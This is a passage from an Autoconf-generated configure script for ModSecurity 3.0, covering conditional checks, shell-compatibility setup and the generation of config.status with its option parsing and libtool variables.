"${USE_MUTEX_ON_PM_FALSE}"; then as_fn_error $? "conditional \"USE_MUTEX_ON_PM\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${AFL_FUZZER_TRUE}" && test -z "${AFL_FUZZER_FALSE}"; then as_fn_error $? "conditional \"AFL_FUZZER\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${DX_COND_doc_TRUE}" && test -z "${DX_COND_doc_FALSE}"; then as_fn_error $? "conditional \"DX_COND_doc\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${DX_COND_dot_TRUE}" && test -z "${DX_COND_dot_FALSE}"; then as_fn_error $? "conditional \"DX_COND_dot\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${DX_COND_man_TRUE}" && test -z "${DX_COND_man_FALSE}"; then as_fn_error $? "conditional \"DX_COND_man\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${DX_COND_rtf_TRUE}" && test -z "${DX_COND_rtf_FALSE}"; then as_fn_error $? "conditional \"DX_COND_rtf\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${DX_COND_xml_TRUE}" && test -z "${DX_COND_xml_FALSE}"; then as_fn_error $? "conditional \"DX_COND_xml\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${DX_COND_chm_TRUE}" && test -z "${DX_COND_chm_FALSE}"; then as_fn_error $? "conditional \"DX_COND_chm\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${DX_COND_chi_TRUE}" && test -z "${DX_COND_chi_FALSE}"; then as_fn_error $? "conditional \"DX_COND_chi\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${DX_COND_html_TRUE}" && test -z "${DX_COND_html_FALSE}"; then as_fn_error $? "conditional \"DX_COND_html\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${DX_COND_ps_TRUE}" && test -z "${DX_COND_ps_FALSE}"; then as_fn_error $? "conditional \"DX_COND_ps\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${DX_COND_pdf_TRUE}" && test -z "${DX_COND_pdf_FALSE}"; then as_fn_error $? "conditional \"DX_COND_pdf\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${DX_COND_latex_TRUE}" && test -z "${DX_COND_latex_FALSE}"; then as_fn_error $? "conditional \"DX_COND_latex\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${VALGRIND_ENABLED_TRUE}" && test -z "${VALGRIND_ENABLED_FALSE}"; then as_fn_error $? "conditional \"VALGRIND_ENABLED\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi : "${CONFIG_STATUS=./config.status}" ac_write_fail=0 ac_clean_files_save=$ac_clean_files ac_clean_files="$ac_clean_files $CONFIG_STATUS" { $as_echo "$as_me:${as_lineno-$LINENO}: creating $CONFIG_STATUS" >&5 $as_echo "$as_me: creating $CONFIG_STATUS" >&6;} as_write_fail=0 cat >$CONFIG_STATUS <<_ASEOF || as_write_fail=1 #! $SHELL # Generated by $as_me. # Run this file to recreate the current configuration. # Compiler output produced by configure, useful for debugging # configure, is in config.log if it exists. debug=false ac_cs_recheck=false ac_cs_silent=false SHELL=\${CONFIG_SHELL-$SHELL} export SHELL _ASEOF cat >>$CONFIG_STATUS <<\_ASEOF || as_write_fail=1 ## -------------------- ## ## M4sh Initialization. ## ## -------------------- ## # Be more Bourne compatible DUALCASE=1; export DUALCASE # for MKS sh if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then : emulate sh NULLCMD=: # Pre-4.2 versions of Zsh do word splitting on ${1+"$@"}, which # is contrary to our usage. Disable this feature. alias -g '${1+"$@"}'='"$@"' setopt NO_GLOB_SUBST else case `(set -o) 2>/dev/null` in #( *posix*) : set -o posix ;; #( *) : ;; esac fi as_nl=' ' export as_nl # Printing a long string crashes Solaris 7 /usr/bin/printf. as_echo='\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo$as_echo # Prefer a ksh shell builtin over an external printf program on Solaris, # but without wasting forks for bash or zsh. if test -z "$BASH_VERSION$ZSH_VERSION" \ && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then as_echo='print -r --' as_echo_n='print -rn --' elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then as_echo='printf %s\n' as_echo_n='printf %s' else if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"' as_echo_n='/usr/ucb/echo -n' else as_echo_body='eval expr "X$1" : "X\\(.*\\)"' as_echo_n_body='eval arg=$1; case $arg in #( *"$as_nl"*) expr "X$arg" : "X\\(.*\\)$as_nl"; arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;; esac; expr "X$arg" : "X\\(.*\\)" | tr -d "$as_nl" ' export as_echo_n_body as_echo_n='sh -c $as_echo_n_body as_echo' fi export as_echo_body as_echo='sh -c $as_echo_body as_echo' fi # The user is always right. if test "${PATH_SEPARATOR+set}" != set; then PATH_SEPARATOR=: (PATH='/bin;/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 && { (PATH='/bin:/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 || PATH_SEPARATOR=';' } fi # IFS # We need space, tab and new line, in precisely that order. Quoting is # there to prevent editors from complaining about space-tab. # (If _AS_PATH_WALK were called with IFS unset, it would disable word # splitting by setting IFS to empty value.) IFS=" "" $as_nl" # Find who we are. Look in the path if we contain no directory separator. as_myself= case $0 in #(( *[\\/]* ) as_myself=$0 ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. test -r "$as_dir/$0" && as_myself=$as_dir/$0 && break done IFS=$as_save_IFS ;; esac # We did not find ourselves, most probably we were run as `sh COMMAND' # in which case we are not to be found in the path. if test "x$as_myself" = x; then as_myself=$0 fi if test ! -f "$as_myself"; then $as_echo "$as_myself: error: cannot find myself; rerun with an absolute file name" >&2 exit 1 fi # Unset variables that we do not need and which cause bugs (e.g. in # pre-3.0 UWIN ksh). But do not cause bugs in bash 2.01; the "|| exit 1" # suppresses any "Segmentation fault" message there. '((' could # trigger a bug in pdksh 5.2.14. for as_var in BASH_ENV ENV MAIL MAILPATH do eval test x\${$as_var+set} = xset \ && ( (unset $as_var) || exit 1) >/dev/null 2>&1 && unset $as_var || : done PS1='$ ' PS2='> ' PS4='+ ' # NLS nuisances. LC_ALL=C export LC_ALL LANGUAGE=C export LANGUAGE # CDPATH. (unset CDPATH) >/dev/null 2>&1 && unset CDPATH # as_fn_error STATUS ERROR [LINENO LOG_FD] # ---------------------------------------- # Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are # provided, also output the error to LOG_FD, referencing LINENO. Then exit the # script with STATUS, using 1 if that was 0. as_fn_error () { as_status=$1; test $as_status -eq 0 && as_status=1 if test "$4"; then as_lineno=${as_lineno-"$3"} as_lineno_stack=as_lineno_stack=$as_lineno_stack $as_echo "$as_me:${as_lineno-$LINENO}: error: $2" >&$4 fi $as_echo "$as_me: error: $2" >&2 as_fn_exit $as_status } # as_fn_error # as_fn_set_status STATUS # ----------------------- # Set $? to STATUS, without forking. as_fn_set_status () { return $1 } # as_fn_set_status # as_fn_exit STATUS # ----------------- # Exit the shell with STATUS, even in a "trap 0" or "set -e" context. as_fn_exit () { set +e as_fn_set_status $1 exit $1 } # as_fn_exit # as_fn_unset VAR # --------------- # Portably unset VAR. as_fn_unset () { { eval $1=; unset $1;} } as_unset=as_fn_unset # as_fn_append VAR VALUE # ---------------------- # Append the text in VALUE to the end of the definition contained in VAR. Take # advantage of any shell optimizations that allow amortized linear growth over # repeated appends, instead of the typical quadratic growth present in naive # implementations. if (eval "as_var=1; as_var+=2; test x\$as_var = x12") 2>/dev/null; then : eval 'as_fn_append () { eval $1+=\$2 }' else as_fn_append () { eval $1=\$$1\$2 } fi # as_fn_append # as_fn_arith ARG... # ------------------ # Perform arithmetic evaluation on the ARGs, and store the result in the # global $as_val. Take advantage of shells that can avoid forks. The arguments # must be portable across $(()) and expr. if (eval "test \$(( 1 + 1 )) = 2") 2>/dev/null; then : eval 'as_fn_arith () { as_val=$(( $* )) }' else as_fn_arith () { as_val=`expr "$@" || test $? -eq 1` } fi # as_fn_arith if expr a : '\(a\)' >/dev/null 2>&1 && test "X`expr 00001 : '.*\(...\)'`" = X001; then as_expr=expr else as_expr=false fi if (basename -- /) >/dev/null 2>&1 && test "X`basename -- / 2>&1`" = "X/"; then as_basename=basename else as_basename=false fi if (as_dir=`dirname -- /` && test "X$as_dir" = X/) >/dev/null 2>&1; then as_dirname=dirname else as_dirname=false fi as_me=`$as_basename -- "$0" || $as_expr X/"$0" : '.*/\([^/][^/]*\)/*$' \| \ X"$0" : 'X\(//\)$' \| \ X"$0" : 'X\(/\)' \| . 2>/dev/null || $as_echo X/"$0" | sed '/^.*\/\([^/][^/]*\)\/*$/{ s//\1/ q } /^X\/\(\/\/\)$/{ s//\1/ q } /^X\/\(\/\).*/{ s//\1/ q } s/.*/./; q'` # Avoid depending upon Character Ranges. as_cr_letters='abcdefghijklmnopqrstuvwxyz' as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' as_cr_Letters=$as_cr_letters$as_cr_LETTERS as_cr_digits='0123456789' as_cr_alnum=$as_cr_Letters$as_cr_digits ECHO_C= ECHO_N= ECHO_T= case `echo -n x` in #((((( -n*) case `echo 'xy\c'` in *c*) ECHO_T=' ';; # ECHO_T is single tab character. xy) ECHO_C='\c';; *) echo `echo ksh88 bug on AIX 6.1` > /dev/null ECHO_T=' ';; esac;; *) ECHO_N='-n';; esac rm -f conf$$ conf$$.exe conf$$.file if test -d conf$$.dir; then rm -f conf$$.dir/conf$$.file else rm -f conf$$.dir mkdir conf$$.dir 2>/dev/null fi if (echo >conf$$.file) 2>/dev/null; then if ln -s conf$$.file conf$$ 2>/dev/null; then as_ln_s='ln -s' # ... but there are two gotchas: # 1) On MSYS, both `ln -s file dir' and `ln file dir' fail. # 2) DJGPP < 2.04 has no symlinks; `ln -s' creates a wrapper executable. # In both cases, we have to default to `cp -pR'. ln -s conf$$.file conf$$.dir 2>/dev/null && test ! -f conf$$.exe || as_ln_s='cp -pR' elif ln conf$$.file conf$$ 2>/dev/null; then as_ln_s=ln else as_ln_s='cp -pR' fi else as_ln_s='cp -pR' fi rm -f conf$$ conf$$.exe conf$$.dir/conf$$.file conf$$.file rmdir conf$$.dir 2>/dev/null # as_fn_mkdir_p # ------------- # Create "$as_dir" as a directory, including parents if necessary. as_fn_mkdir_p () { case $as_dir in #( -*) as_dir=./$as_dir;; esac test -d "$as_dir" || eval $as_mkdir_p || { as_dirs= while :; do case $as_dir in #( *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'( *) as_qdir=$as_dir;; esac as_dirs="'$as_qdir' $as_dirs" as_dir=`$as_dirname -- "$as_dir" || $as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ X"$as_dir" : 'X\(//\)[^/]' \| \ X"$as_dir" : 'X\(//\)$' \| \ X"$as_dir" : 'X\(/\)' \| . 2>/dev/null || $as_echo X"$as_dir" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q } /^X\(\/\/\)[^/].*/{ s//\1/ q } /^X\(\/\/\)$/{ s//\1/ q } /^X\(\/\).*/{ s//\1/ q } s/.*/./; q'` test -d "$as_dir" && break done test -z "$as_dirs" || eval "mkdir $as_dirs" } || test -d "$as_dir" || as_fn_error $? "cannot create directory $as_dir" } # as_fn_mkdir_p if mkdir -p . 2>/dev/null; then as_mkdir_p='mkdir -p "$as_dir"' else test -d ./-p && rmdir ./-p as_mkdir_p=false fi # as_fn_executable_p FILE # ----------------------- # Test if FILE is an executable regular file. as_fn_executable_p () { test -f "$1" && test -x "$1" } # as_fn_executable_p as_test_x='test -x' as_executable_p=as_fn_executable_p # Sed expression to map a string onto a valid CPP name. as_tr_cpp="eval sed 'y%*$as_cr_letters%P$as_cr_LETTERS%;s%[^_$as_cr_alnum]%_%g'" # Sed expression to map a string onto a valid variable name. as_tr_sh="eval sed 'y%*+%pp%;s%[^_$as_cr_alnum]%_%g'" exec 6>&1 ## ----------------------------------- ## ## Main body of $CONFIG_STATUS script. ## ## ----------------------------------- ## _ASEOF test $as_write_fail = 0 && chmod +x $CONFIG_STATUS || ac_write_fail=1 cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 # Save the log message, to keep $0 and so on meaningful, and to # report actual input values of CONFIG_FILES etc. instead of their # values after options handling. ac_log=" This file was extended by modsecurity $as_me 3.0, which was generated by GNU Autoconf 2.69. Invocation command line was CONFIG_FILES = $CONFIG_FILES CONFIG_HEADERS = $CONFIG_HEADERS CONFIG_LINKS = $CONFIG_LINKS CONFIG_COMMANDS = $CONFIG_COMMANDS $ $0 $@ on `(hostname || uname -n) 2>/dev/null | sed 1q` " _ACEOF case $ac_config_files in *" "*) set x $ac_config_files; shift; ac_config_files=$*;; esac case $ac_config_headers in *" "*) set x $ac_config_headers; shift; ac_config_headers=$*;; esac cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 # Files that config.status was made for. config_files="$ac_config_files" config_headers="$ac_config_headers" config_commands="$ac_config_commands" _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 ac_cs_usage="\ \`$as_me' instantiates files and other configuration actions from templates according to the current configuration. Unless the files and actions are specified as TAGs, all are instantiated by default. Usage: $0 [OPTION]... [TAG]... -h, --help print this help, then exit -V, --version print version number and configuration settings, then exit --config print configuration, then exit -q, --quiet, --silent do not print progress messages -d, --debug don't remove temporary files --recheck update $as_me by reconfiguring in the same conditions --file=FILE[:TEMPLATE] instantiate the configuration file FILE --header=FILE[:TEMPLATE] instantiate the configuration header FILE Configuration files: $config_files Configuration headers: $config_headers Configuration commands: $config_commands Report bugs to ." _ACEOF cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 ac_cs_config="`$as_echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`" ac_cs_version="\\ modsecurity config.status 3.0 configured by $0, generated by GNU Autoconf 2.69, with options \\"\$ac_cs_config\\" Copyright (C) 2012 Free Software Foundation, Inc. This config.status script is free software; the Free Software Foundation gives unlimited permission to copy, distribute and modify it." ac_pwd='$ac_pwd' srcdir='$srcdir' INSTALL='$INSTALL' MKDIR_P='$MKDIR_P' AWK='$AWK' test -n "\$AWK" || AWK=awk _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 # The default lists apply if the user does not specify any file. ac_need_defaults=: while test $# != 0 do case $1 in --*=?*) ac_option=`expr "X$1" : 'X\([^=]*\)='` ac_optarg=`expr "X$1" : 'X[^=]*=\(.*\)'` ac_shift=: ;; --*=) ac_option=`expr "X$1" : 'X\([^=]*\)='` ac_optarg= ac_shift=: ;; *) ac_option=$1 ac_optarg=$2 ac_shift=shift ;; esac case $ac_option in # Handling of the options. -recheck | --recheck | --rechec | --reche | --rech | --rec | --re | --r) ac_cs_recheck=: ;; --version | --versio | --versi | --vers | --ver | --ve | --v | -V ) $as_echo "$ac_cs_version"; exit ;; --config | --confi | --conf | --con | --co | --c ) $as_echo "$ac_cs_config"; exit ;; --debug | --debu | --deb | --de | --d | -d ) debug=: ;; --file | --fil | --fi | --f ) $ac_shift case $ac_optarg in *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;; '') as_fn_error $? "missing file argument" ;; esac as_fn_append CONFIG_FILES " '$ac_optarg'" ac_need_defaults=false;; --header | --heade | --head | --hea ) $ac_shift case $ac_optarg in *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;; esac as_fn_append CONFIG_HEADERS " '$ac_optarg'" ac_need_defaults=false;; --he | --h) # Conflict between --help and --header as_fn_error $? "ambiguous option: \`$1' Try \`$0 --help' for more information.";; --help | --hel | -h ) $as_echo "$ac_cs_usage"; exit ;; -q | -quiet | --quiet | --quie | --qui | --qu | --q \ | -silent | --silent | --silen | --sile | --sil | --si | --s) ac_cs_silent=: ;; # This is an error. -*) as_fn_error $? "unrecognized option: \`$1' Try \`$0 --help' for more information." ;; *) as_fn_append ac_config_targets " $1" ac_need_defaults=false ;; esac shift done ac_configure_extra_args= if $ac_cs_silent; then exec 6>/dev/null ac_configure_extra_args="$ac_configure_extra_args --silent" fi _ACEOF cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 if \$ac_cs_recheck; then set X $SHELL '$0' $ac_configure_args \$ac_configure_extra_args --no-create --no-recursion shift \$as_echo "running CONFIG_SHELL=$SHELL \$*" >&6 CONFIG_SHELL='$SHELL' export CONFIG_SHELL exec "\$@" fi _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 exec 5>>config.log { echo sed 'h;s/./-/g;s/^.../## /;s/...$/ ##/;p;x;p;x' <<_ASBOX ## Running $as_me. ## _ASBOX $as_echo "$ac_log" } >&5 _ACEOF cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 # # INIT-COMMANDS # AMDEP_TRUE="$AMDEP_TRUE" MAKE="${MAKE-make}" # The HP-UX ksh and POSIX shell print the target directory to stdout # if CDPATH is set. (unset CDPATH) >/dev/null 2>&1 && unset CDPATH sed_quote_subst='$sed_quote_subst' double_quote_subst='$double_quote_subst' delay_variable_subst='$delay_variable_subst' macro_version='`$ECHO "$macro_version" | $SED "$delay_single_quote_subst"`' macro_revision='`$ECHO "$macro_revision" | $SED "$delay_single_quote_subst"`' enable_shared='`$ECHO "$enable_shared" | $SED "$delay_single_quote_subst"`' enable_static='`$ECHO "$enable_static" | $SED "$delay_single_quote_subst"`' pic_mode='`$ECHO "$pic_mode" | $SED "$delay_single_quote_subst"`' enable_fast_install='`$ECHO "$enable_fast_install" | $SED "$delay_single_quote_subst"`' shared_archive_member_spec='`$ECHO "$shared_archive_member_spec" | $SED "$delay_single_quote_subst"`' SHELL='`$ECHO "$SHELL" | $SED "$delay_single_quote_subst"`' ECHO='`$ECHO "$ECHO" | $SED "$delay_single_quote_subst"`' PATH_SEPARATOR='`$ECHO "$PATH_SEPARATOR" | $SED "$delay_single_quote_subst"`' host_alias='`$ECHO "$host_alias" | $SED "$delay_single_quote_subst"`' host='`$ECHO "$host" | $SED "$delay_single_quote_subst"`' host_os='`$ECHO "$host_os" | $SED "$delay_single_quote_subst"`' build_alias='`$ECHO "$build_alias" | $SED "$delay_single_quote_subst"`' build='`$ECHO "$build" | $SED "$delay_single_quote_subst"`' build_os='`$ECHO "$build_os" | $SED "$delay_single_quote_subst"`' SED='`$ECHO "$SED" | $SED "$delay_single_quote_subst"`' Xsed='`$ECHO "$Xsed" | $SED "$delay_single_quote_subst"`' GREP='`$ECHO "$GREP" | $SED "$delay_single_quote_subst"`' EGREP='`$ECHO "$EGREP" | $SED "$delay_single_quote_subst"`' FGREP='`$ECHO "$FGREP" | $SED "$delay_single_quote_subst"`' LD='`$ECHO "$LD" | $SED "$delay_single_quote_subst"`' NM='`$ECHO "$NM" | $SED "$delay_single_quote_subst"`' LN_S='`$ECHO "$LN_S" | $SED "$delay_single_quote_subst"`' max_cmd_len='`$ECHO "$max_cmd_len" | $SED "$delay_single_quote_subst"`' ac_objext='`$ECHO "$ac_objext" | $SED "$delay_single_quote_subst"`' exeext='`$ECHO "$exeext" | $SED "$delay_single_quote_subst"`' lt_unset='`$ECHO "$lt_unset" | $SED "$delay_single_quote_subst"`' lt_SP2NL='`$ECHO "$lt_SP2NL" | $SED "$delay_single_quote_subst"`' lt_NL2SP='`$ECHO "$lt_NL2SP" | $SED "$delay_single_quote_subst"`' lt_cv_to_host_file_cmd='`$ECHO "$lt_cv_to_host_file_cmd" | $SED "$delay_single_quote_subst"`' lt_cv_to_tool_file_cmd='`$ECHO "$lt_cv_to_tool_file_cmd" | $SED "$delay_single_quote_subst"`' reload_flag='`$ECHO "$reload_flag" | $SED "$delay_single_quote_subst"`' reload_cmds='`$ECHO "$reload_cmds" | $SED "$delay_single_quote_subst"`' OBJDUMP='`$ECHO "$OBJDUMP" | $SED "$delay_single_quote_subst"`' deplibs_check_method='`$ECHO "$deplibs_check_method" | $SED "$delay_single_quote_subst"`' file_magic_cmd='`$ECHO "$file_magic_cmd" | $SED "$delay_single_quote_subst"`' file_magic_glob='`$ECHO "$file_magic_glob" | $SED "$delay_single_quote_subst"`' want_nocaseglob='`$ECHO "$want_nocaseglob" | $SED "$delay_single_quote_subst"`' DLLTOOL='`$ECHO "$DLLTOOL" | $SED "$delay_single_quote_subst"`' sharedlib_from_linklib_cmd='`$ECHO "$sharedlib_from_linklib_cmd" | $SED "$delay_single_quote_subst"`' AR='`$ECHO "$AR" | $SED "$delay_single_quote_subst"`' lt_ar_flags='`$ECHO "$lt_ar_flags" | $SED "$delay_single_quote_subst"`' AR_FLAGS='`$ECHO "$AR_FLAGS" | $SED "$delay_single_quote_subst"`' archiver_list_spec='`$ECHO "$archiver_list_spec" | $SED "$delay_single_quote_subst"`' STRIP='`$ECHO "$STRIP" | $SED "$delay_single_quote_subst"`' RANLIB='`$ECHO "$RANLIB" | $SED "$delay_single_quote_subst"`' old_postinstall_cmds='`$ECHO "$old_postinstall_cmds" | $SED "$delay_single_quote_subst"`' old_postuninstall_cmds='`$ECHO "$old_postuninstall_cmds" | $SED "$delay_single_quote_subst"`' old_archive_cmds='`$ECHO "$old_archive_cmds" | $SED "$delay_single_quote_subst"`' lock_old_archive_extraction='`$ECHO "$lock_old_archive_extraction" | $SED "$delay_single_quote_subst"`' CC='`$ECHO "$CC" | $SED "$delay_single_quote_subst"`' CFLAGS='`$ECHO "$CFLAGS" | $SED "$delay_single_quote_subst"`' compiler='`$ECHO "$compiler" | $SED "$delay_single_quote_subst"`' GCC='`$ECHO "$GCC" | $SED "$delay_single_quote_subst"`' lt_cv_sys_global_symbol_pipe='`$ECHO "$lt_cv_sys_global_symbol_pipe" | $SED "$delay_single_quote_subst"`' lt_cv_sys_global_symbol_to_cdecl='`$ECHO "$lt_cv_sys_global_symbol_to_cdecl" | $SED "$delay_single_quote_subst"`' lt_cv_sys_global_symbol_to_import='`$ECHO "$lt_cv_sys_global_symbol_to_import" | $SED "$delay_single_quote_subst"`' lt_cv_sys_global_symbol_to_c_name_address='`$ECHO "$lt_cv_sys_global_symbol_to_c_name_address" | $SED "$delay_single_quote_subst"`' lt_cv_sys_global_symbol_to_c_name_address_lib_prefix='`$ECHO "$lt_cv_sys_global_symbol_to_c_name_address_lib_prefix" | $SED "$delay_single_quote_subst"`' lt_cv_nm_interface='`$ECHO "$lt_cv_nm_interface" | $SED "$delay_single_quote_subst"`' nm_file_list_spec='`$ECHO "$nm_file_list_spec" | $SED "$delay_single_quote_subst"`' lt_sysroot='`$ECHO "$lt_sysroot" | $SED "$delay_single_quote_subst"`' lt_cv_truncate_bin='`$ECHO "$lt_cv_truncate_bin" | $SED "$delay_single_quote_subst"`' objdir='`$ECHO "$objdir" | $SED "$delay_single_quote_subst"`' MAGIC_CMD='`$ECHO "$MAGIC_CMD" | $SED "$delay_single_quote_subst"`' lt_prog_compiler_no_builtin_flag='`$ECHO "$lt_prog_compiler_no_builtin_flag" | $SED "$delay_single_quote_subst"`' lt_prog_compiler_pic='`$ECHO "$lt_prog_compiler_pic" | $SED "$delay_single_quote_subst"`' lt_prog_compiler_wl='`$ECHO "$lt_prog_compiler_wl" | $SED "$delay_single_quote_subst"`' lt_prog_compiler_static='`$ECHO "$lt_prog_compiler_static" | $SED "$delay_single_quote_subst"`' lt_cv_prog_compiler_c_o='`$ECHO "$lt_cv_prog_compiler_c_o" | $SED "$delay_single_quote_subst"`' need_locks='`$ECHO "$need_locks" | $SED "$delay_single_quote_subst"`' MANIFEST_TOOL='`$ECHO "$MANIFEST_TOOL" | $SED "$delay_single_quote_subst"`' DSYMUTIL='`$ECHO "$DSYMUTIL" | $SED "$delay_single_quote_subst"`' NMEDIT='`$ECHO "$NMEDIT" | $SED "$delay_single_quote_subst"`' LIPO='`$ECHO "$LIPO" | $SED "$delay_single_quote_subst"`' OTOOL='`$ECHO "$OTOOL" | $SED "$delay_single_quote_subst"`' OTOOL64='`$ECHO "$OTOOL64" | $SED "$delay_single_quote_subst"`' libext='`$ECHO "$libext" | $SED "$delay_single_quote_subst"`' shrext_cmds='`$ECHO "$shrext_cmds" | $SED "$delay_single_quote_subst"`' extract_expsyms_cmds='`$ECHO "$extract_expsyms_cmds" | $SED "$delay_single_quote_subst"`' archive_cmds_need_lc='`$ECHO "$archive_cmds_need_lc" | $SED "$delay_single_quote_subst"`' enable_shared_with_static_runtimes='`$ECHO "$enable_shared_with_static_runtimes" | $SED "$delay_single_quote_subst"`' export_dynamic_flag_spec='`$ECHO "$export_dynamic_flag_spec" | $SED "$delay_single_quote_subst"`' whole_archive_flag_spec='`$ECHO "$whole_archive_flag_spec" | $SED "$delay_single_quote_subst"`' compiler_needs_object='`$ECHO "$compiler_needs_object" | $SED "$delay_single_quote_subst"`' old_archive_from_new_cmds='`$ECHO "$old_archive_from_new_cmds" | $SED "$delay_single_quote_subst"`' old_archive_from_expsyms_cmds='`$ECHO "$old_archive_from_expsyms_cmds" | $SED "$delay_single_quote_subst"`' archive_cmds='`$ECHO "$archive_cmds" | $SED "$delay_single_quote_subst"`' archive_expsym_cmds='`$ECHO "$archive_expsym_cmds" | $SED "$delay_single_quote_subst"`' module_cmds='`$ECHO "$module_cmds" | $SED "$delay_single_quote_subst"`' module_expsym_cmds='`$ECHO "$module_expsym_cmds" | $SED "$delay_single_quote_subst"`' with_gnu_ld='`$ECHO "$with_gnu_ld" | $SED "$delay_single_quote_subst"`' allow_undefined_flag='`$ECHO "$allow_undefined_flag" | $SED "$delay_single_quote_subst"`' no_undefined_flag='`$ECHO "$no_undefined_flag" | $SED "$delay_single_quote_subst"`' hardcode_libdir_flag_spec='`$ECHO "$hardcode_libdir_flag_spec" | $SED "$delay_single_quote_subst"`' hardcode_libdir_separator='`$ECHO "$hardcode_libdir_separator" | $SED "$delay_single_quote_subst"`' hardcode_direct='`$ECHO "$hardcode_direct" | $SED "$delay_single_quote_subst"`' hardcode_direct_absolute='`$ECHO "$hardcode_direct_absolute" | $SED "$delay_single_quote_subst"`' hardcode_minus_L='`$ECHO "$hardcode_minus_L" | $SED "$delay_single_quote_subst"`' hardcode_shlibpath_var='`$ECHO "$hardcode_shlibpath_var" | $SED "$delay_single_quote_subst"`' hardcode_automatic='`$ECHO "$hardcode_automatic" | $SED "$delay_single_quote_subst"`' inherit_rpath='`$ECHO "$inherit_rpath" | $SED "$delay_single_quote_subst"`' link_all_deplibs='`$ECHO "$link_all_deplibs" | $SED "$delay_single_quote_subst"`' always_export_symbols='`$ECHO "$always_export_symbols" | $SED "$delay_single_quote_subst"`' export_symbols_cmds='`$ECHO "$export_symbols_cmds" | $SED "$delay_single_quote_subst"`' exclude_expsyms='`$ECHO "$exclude_expsyms" | $SED "$delay_single_quote_subst"`' include_expsyms='`$ECHO "$include_expsyms" | $SED "$delay_single_quote_subst"`' prelink_cmds='`$ECHO "$prelink_cmds" | $SED "$delay_single_quote_subst"`' postlink_cmds='`$ECHO "$postlink_cmds" | $SED "$delay_single_quote_subst"`' file_list_spec='`$ECHO "$file_list_spec" | $SED "$delay_single_quote_subst"`' variables_saved_for_relink='`$ECHO "$variables_saved_for_relink" | $SED "$delay_single_quote_subst"`' need_lib_prefix='`$ECHO "$need_lib_prefix" | $SED "$delay_single_quote_subst"`' need_version='`$ECHO "$need_version" | $SED "$delay_single_quote_subst"`' version_type='`$ECHO "$version_type" | $SED "$delay_single_quote_subst"`' runpath_var='`$ECHO "$runpath_var" | $SED "$delay_single_quote_subst"`' shlibpath_var='`$ECHO "$shlibpath_var" | $SED "$delay_single_quote_subst"`' shlibpath_overrides_runpath='`$ECHO "$shlibpath_overrides_runpath" | $SED "$delay_single_quote_subst"`' libname_spec='`$ECHO "$libname_spec" | $SED "$delay_single_quote_subst"`' library_names_spec='`$ECHO "$library_names_spec" | $SED "$delay_single_quote_subst"`' soname_spec='`$ECHO "$soname_spec" | $SED "$delay_single_quote_subst"`' install_override_mode='`$ECHO "$install_override_mode" | $SED "$delay_single_quote_subst"`' postinstall_cmds='`$ECHO "$postinstall_cmds" | $SED "$delay_single_quote_subst"`' postuninstall_cmds='`$ECHO "$postuninstall_cmds" | $SED "$delay_single_quote_subst"`' finish_cmds='`$ECHO "$finish_cmds" | $SED "$delay_single_quote_subst"`' finish_eval='`$ECHO "$finish_eval" | $SED "$delay_single_quote_subst"`' hardcode_into_libs='`$ECHO "$hardcode_into_libs" | $SED "$delay_single_quote_subst"`' sys_lib_search_path_spec='`$ECHO "$sys_lib_search_path_spec" | $SED "$delay_single_quote_subst"`' configure_time_dlsearch_path='`$ECHO "$configure_time_dlsearch_path" | $SED "$delay_single_quote_subst"`' configure_time_lt_sys_library_path='`$ECHO "$configure_time_lt_sys_library_path" | $SED "$delay_single_quote_subst"`' 